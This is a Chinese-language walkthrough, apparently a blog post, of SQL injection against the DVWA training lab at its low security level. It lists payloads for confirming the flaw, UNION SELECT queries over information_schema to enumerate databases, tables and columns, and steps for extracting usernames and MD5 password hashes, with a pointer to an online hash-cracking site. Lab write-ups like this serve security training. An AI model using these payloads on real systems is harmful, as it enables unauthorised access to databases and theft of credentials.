dvwa靶场之SQL注入(low等级)

dvwa靶场之SQL注入(low等级)

1. 第一步(判断是否可以注入)
1’ and 1=1#(正常回显)
1’ and 1=2#(无回显)
1’ or 1=1#(该表下所有数据项回显)
以上几步骤基本判断有sql注入漏洞dvwa靶场之SQL注入(low等级)_第1张图片
2. 第二步(找到目标数据库)
’ union select table_schema,table_name from information_schema.tables #’ union select table_schema,table_name from information_schema.tables #
用此条payload可以得到次mysql数据库管理系统下所有数据库的名字以及表名(但是数据太多混乱)dvwa靶场之SQL注入(low等级)_第2张图片

’ union select table_schema,count(*) from information_schema.tables group by table_schema#
此条sql语句可以得到次数据库管理系统中所有数据库名以及每个数据库下有多少表
可以看到dvwa即为目标数据库
dvwa靶场之SQL注入(low等级)_第3张图片
3. 第三步(找到目标数据库下的表)

'union select table_schema ,table_name from information_schema.tables where table_schema='dvwa' #

dvwa靶场之SQL注入(low等级)_第4张图片
目标表为dvwa数据库下的users表

4. 找到目标表下的字段名称

'union select column_name,table_name from information_schema.columns where table_name=‘users’#dvwa靶场之SQL注入(low等级)_第5张图片
目标字段应当是user和password
(到现在这步总结一下:dvwa数据库下有users表,users表下有user和password字段)

5. 最后找到用户名密码
dvwa靶场之SQL注入(low等级)_第6张图片
(密码是md5加密过的,用MD5在线解密即可这里推荐一个网址(https://www.cmd5.com/))

你可能感兴趣的:(CTF)